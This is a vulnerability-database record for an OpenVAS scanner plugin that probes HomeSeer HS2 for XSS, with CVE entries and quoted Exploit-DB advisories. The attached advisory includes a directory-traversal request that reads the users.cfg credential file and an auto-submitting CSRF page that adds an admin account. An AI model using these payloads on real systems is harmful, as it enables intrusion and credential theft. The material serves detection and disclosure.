HomeSeer HS2 Web Interface Multiple Vulnerabilities
2011-12-20T00:00:00
ID OPENVAS:1361412562310902648 Type openvas Reporter Copyright (C) 2011 SecPod Modified 2020-05-08T00:00:00
Description
This host is running HomeSeer HS2 and is prone to multiple
vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
#
# HomeSeer HS2 Web Interface Multiple Vulnerabilities
#
# Authors:
# Rachana Shetty <srachana@secpod.com>
#
# Copyright:
# Copyright (C) 2011 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.902648");
script_version("2020-05-08T08:34:44+0000");
script_cve_id("CVE-2011-4835", "CVE-2011-4836", "CVE-2011-4837");
script_bugtraq_id(50978);
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"last_modification", value:"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)");
script_tag(name:"creation_date", value:"2011-12-20 15:01:39 +0530 (Tue, 20 Dec 2011)");
script_name("HomeSeer HS2 Web Interface Multiple Vulnerabilities");
script_xref(name:"URL", value:"http://secunia.com/advisories/47191/");
script_xref(name:"URL", value:"http://www.kb.cert.org/vuls/id/796883");
script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/71713");
script_tag(name:"qod_type", value:"remote_vul");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2011 SecPod");
script_family("Web application abuses");
script_dependencies("gb_get_http_banner.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("HomeSeer/banner");
script_tag(name:"impact", value:"Successful exploitation will allow attacker to execute arbitrary
HTML and script code in a user's browser session in the context of a vulnerable
site and gain sensitive information via directory traversal attacks.");
script_tag(name:"affected", value:"HomeSeer HS2 version 2.5.0.20.");
script_tag(name:"insight", value:"The flaws are due to improper validation of user-supplied input
passed via the URL, which allows attacker to conduct stored and reflective
xss by sending a crafted request with JavaScript to web interface and
causing the JavaScript to be stored in the log viewer page.");
script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
release, disable respective features, remove the product or replace the product by another one.");
script_tag(name:"summary", value:"This host is running HomeSeer HS2 and is prone to multiple
vulnerabilities.");
script_tag(name:"solution_type", value:"WillNotFix");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
port = http_get_port(default:80);
banner = http_get_remote_headers(port: port);
if(!banner || "Server: HomeSeer" >!< banner)
exit(0);
url = string("/stat<script>alert(document.cookie)</script>");
sndReq = http_get(item:url, port:port);
rcvRes = http_send_recv(port:port, data:sndReq);
if(http_vuln_check(port:port, url:"/elog", pattern:"<script>alert\(document\.cookie\)</script>", check_header:TRUE)) {
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
{"id": "OPENVAS:1361412562310902648", "type": "openvas", "bulletinFamily": "scanner", "title": "HomeSeer HS2 Web Interface Multiple Vulnerabilities", "description": "This host is running HomeSeer HS2 and is prone to multiple\n vulnerabilities.", "published": "2011-12-20T00:00:00", "modified": "2020-05-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902648", "reporter": "Copyright (C) 2011 SecPod", "references": ["http://xforce.iss.net/xforce/xfdb/71713", "http://secunia.com/advisories/47191/", "http://www.kb.cert.org/vuls/id/796883"], "cvelist": ["CVE-2011-4836", "CVE-2011-4835", "CVE-2011-4837"], "lastseen": "2020-05-12T17:32:52", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4835", "CVE-2011-4836", "CVE-2011-4837"]}, {"type": "openvas", "idList": ["OPENVAS:902648"]}, {"type": "exploitdb", "idList": ["EDB-ID:18567", "EDB-ID:36429"]}], "modified": "2020-05-12T17:32:52", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-05-12T17:32:52", "rev": 2}, "vulnersScore": 6.8}, "pluginID": "1361412562310902648", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HomeSeer HS2 Web Interface Multiple Vulnerabilities\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902648\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2011-4835\", \"CVE-2011-4836\", \"CVE-2011-4837\");\n script_bugtraq_id(50978);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-12-20 15:01:39 +0530 (Tue, 20 Dec 2011)\");\n script_name(\"HomeSeer HS2 Web Interface Multiple Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/47191/\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/796883\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/71713\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"HomeSeer/banner\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary\n HTML and script code in a user's browser session in the context of a vulnerable\n site and gain sensitive information via directory traversal attacks.\");\n\n script_tag(name:\"affected\", value:\"HomeSeer HS2 version 2.5.0.20.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to improper validation of user-supplied input\n passed via the URL, which allows attacker to conduct stored and reflective\n xss by sending a crafted request with JavaScript to web interface and\n causing the JavaScript to be stored in the log viewer page.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"This host is running HomeSeer HS2 and is prone to multiple\n vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port(default:80);\nbanner = http_get_remote_headers(port: port);\n\nif(!banner || \"Server: HomeSeer\" >!< banner)\n exit(0);\n\nurl = string(\"/stat<script>alert(document.cookie)</script>\");\nsndReq = http_get(item:url, port:port);\nrcvRes = http_send_recv(port:port, data:sndReq);\n\nif(http_vuln_check(port:port, url:\"/elog\", pattern:\"<script>alert\\(document\\.cookie\\)</script>\", check_header:TRUE)) {\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n", "naslFamily": "Web application abuses", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:51:09", "description": "Cross-site request forgery (CSRF) vulnerability in /ctrl in the web interface in HomeSeer HS2 2.5.0.20 allows remote attackers to hijack the authentication of admins for requests that execute arbitrary programs.", "edition": 4, "cvss3": {}, "published": "2011-12-15T03:57:00", "title": "CVE-2011-4837", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4837"], "modified": "2011-12-15T05:00:00", "cpe": ["cpe:/a:homeseer:homeseer_hs2:2.5.0.20"], "id": "CVE-2011-4837", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4837", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:homeseer:homeseer_hs2:2.5.0.20:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:09", "description": "Cross-site scripting (XSS) vulnerability in the web interface in HomeSeer HS2 2.5.0.20 allows remote attackers to inject arbitrary web script or HTML via a request for a crafted URI.", "edition": 4, "cvss3": {}, "published": "2011-12-15T03:57:00", "title": "CVE-2011-4836", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4836"], "modified": "2011-12-15T19:54:00", "cpe": ["cpe:/a:homeseer:homeseer_hs2:2.5.0.20"], "id": "CVE-2011-4836", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4836", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:homeseer:homeseer_hs2:2.5.0.20:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:09", "description": "Directory traversal vulnerability in the web interface in HomeSeer HS2 2.5.0.20 allows remote attackers to access arbitrary files via unspecified vectors.", "edition": 4, "cvss3": {}, "published": "2011-12-15T03:57:00", "title": "CVE-2011-4835", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4835"], "modified": "2011-12-15T19:53:00", "cpe": ["cpe:/a:homeseer:homeseer_hs2:2.5.0.20"], "id": "CVE-2011-4835", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4835", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:homeseer:homeseer_hs2:2.5.0.20:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-09-04T14:19:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4836", "CVE-2011-4835", "CVE-2011-4837"], "description": "This host is running HomeSeer HS2 and is prone to multiple\nvulnerabilities.", "modified": "2017-08-28T00:00:00", "published": "2011-12-20T00:00:00", "id": "OPENVAS:902648", "href": "http://plugins.openvas.org/nasl.php?oid=902648", "type": "openvas", "title": "HomeSeer HS2 Web Interface Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_homeseer_hs2_web_interface_mult_vuln.nasl 7015 2017-08-28 11:51:24Z teissa $\n#\n# HomeSeer HS2 Web Interface Multiple Vulnerabilities\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attacker to execute arbitrary\nHTML and script code in a user's browser session in the context of a vulnerable\nsite and gain sensitive information via directory traversal attacks.\n\nImpact Level: Application\";\n\ntag_affected = \"HomeSeer HS2 version 2.5.0.20\";\n\ntag_insight = \"The flaws are due to improper validation of user-supplied input\npassed via the URL, which allows attacker to conduct stored and reflective\nxss by sending a crafted request with JavaScript to web interface and\ncausing the JavaScript to be stored in the log viewer page.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"This host is running HomeSeer HS2 and is prone to multiple\nvulnerabilities.\";\n\nif(description)\n{\n script_id(902648);\n script_version(\"$Revision: 7015 $\");\n script_cve_id(\"CVE-2011-4835\", \"CVE-2011-4836\", \"CVE-2011-4837\");\n script_bugtraq_id(50978);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-28 13:51:24 +0200 (Mon, 28 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-20 15:01:39 +0530 (Tue, 20 Dec 2011)\");\n script_name(\"HomeSeer HS2 Web Interface Multiple Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/47191/\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/796883\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/71713\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"HomeSeer/banner\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n##\n## The script code starts here\n##\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Get HTTP Port\nport = get_http_port(default:80);\nif(!port){\n exit(0);\n}\n\n## Check port status\nif(!get_port_state(port)){\n exit(0);\n}\n\n## Get the banner\nbanner = get_http_banner(port: port);\n\n## Confirm the application before trying exploit\nif(\"Server: HomeSeer\" >!< banner) {\n exit(0);\n}\n\n## Construct the attack request\nsndReq = http_get(item:string(\"/stat<script>alert(document.cookie)\" +\n \"</script>\"), port:port);\nrcvRes = http_send_recv(port:port, data:sndReq);\n\n## Confirm the exploit\nif(http_vuln_check(port:port, url:\"/elog\", pattern:\"<script>alert\\(\" +\n \"document.cookie\\)</script>\", check_header:TRUE))\n{\n security_message(port);\n exit(0);\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T09:59:32", "description": "HomeSeer HS2 and HomeSeer PRO Multiple Vulnerabilities. CVE-2011-4835,CVE-2011-4837. Webapps exploit for windows platform", "published": "2012-03-07T00:00:00", "type": "exploitdb", "title": "HomeSeer HS2 and HomeSeer PRO Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4835", "CVE-2011-4837"], "modified": "2012-03-07T00:00:00", "id": "EDB-ID:18567", "href": "https://www.exploit-db.com/exploits/18567/", "sourceData": "# HomeSeer Home Automation Software Multiple Web Vulnerabilities (0day)\r\n# Date: 3/6/12\r\n# Author: Silent_Dream\r\n# Software Link: http://www.homeseer.com/pub/setuphs2_5_0_49.exe\r\n# Version: 2.5.0.49\r\n# Tested on: Win XP\r\n# CERT VU#796883: http://www.kb.cert.org/vuls/id/796883\r\n#Note: This affects both HomeSeer HS2 and HomeSeer PRO. \r\n#Previously reported XSS attack vector (elog) reported to CERT was fixed in 2.5.0.49 update.\r\n\r\nA) Directory Traversal: Retrieving the users.cfg file which contains HomeSeer usernames, access levels, and encrypted passwords.\r\n\r\nncat 192.168.0.1 80\r\nGET /..\\Config\\users.cfg HTTP/1.0\r\n\r\nHTTP/1.0 200 OK\r\nServer: HomeSeer\r\nContent-Type: application/\r\nAccept-Ranges: bytes\r\nContent-Length: 195\r\n\r\n2\r\nEFBBBF6775657374,EFBBBF4853454E4332774B51364D614C53436D534D41697A48617450514D513\r\nD3D,EFBBBF31\r\nEFBBBF64656661756C74,EFBBBF4853454E43327A68336A307A412F585153776F7032575A54534E6\r\n3773D3D,EFBBBF36\r\n\r\nB) Cross-Site Request Forgery: It is possible to add a new admin user by tricking logged-in admin to visit a malicious URL.\r\nThis POC adds user \"hacker\" with pass \"hacked\" as a HomeSeer admin.\r\n\r\n <html>\r\n <body onload=\"javascript:document.forms[0].submit()\">\r\n <H2>HomeSeer CSRF Exploit to add new administrator account</H2>\r\n <form method=\"POST\" name=\"form0\" action=\"http://localhost/ctrl \">\r\n <input type=\"hidden\" name=\"wuNEWUSERNAME\" value=\"hacker\"/>\r\n <input type=\"hidden\" name=\"wuNEWUSERPASS\" value=\"hacked\"/>\r\n <input type=\"hidden\" name=\"wuNEWUSERRIGHTS\" value=\"Admin\"/>\r\n <input type=\"hidden\" name=\"wuNEWUSERADD\" value=\"Add\"/>\r\n <input type=\"hidden\" name=\"stay_on_webusers\" value=\"Hello\"/>\r\n </form>\r\n </body>\r\n </html>", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18567/"}, {"lastseen": "2016-02-04T03:29:35", "description": "HomeSeer HS2 2.5.0.20 Web Interface Log Viewer Page URI XSS. CVE-2011-4836. Remote exploit for hardware platform", "published": "2011-12-08T00:00:00", "type": "exploitdb", "title": "HomeSeer HS2 2.5.0.20 Web Interface Log Viewer Page URI XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4836"], "modified": "2011-12-08T00:00:00", "id": "EDB-ID:36429", "href": "https://www.exploit-db.com/exploits/36429/", "sourceData": "source: http://www.securityfocus.com/bid/50978/info\r\n\r\nHS2 web interface is prone to multiple security vulnerabilities:\r\n\r\n1. An HTML-injection vulnerability.\r\n2. A cross-site request-forgery vulnerability.\r\n3. A directory-traversal vulnerability.\r\n\r\nAttackers can exploit these issues to perform certain actions in the context of an authorized user's session, run arbitrary HTML and script code, and transfer files outside of the web directory. Other attacks may also be possible.\r\n\r\nHomeSeer HS2 2.5.0.20 is vulnerable; prior versions may also be affected. \r\n\r\nhttp://www.example.com/example<script>alert(document.cookie)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/36429/"}]}
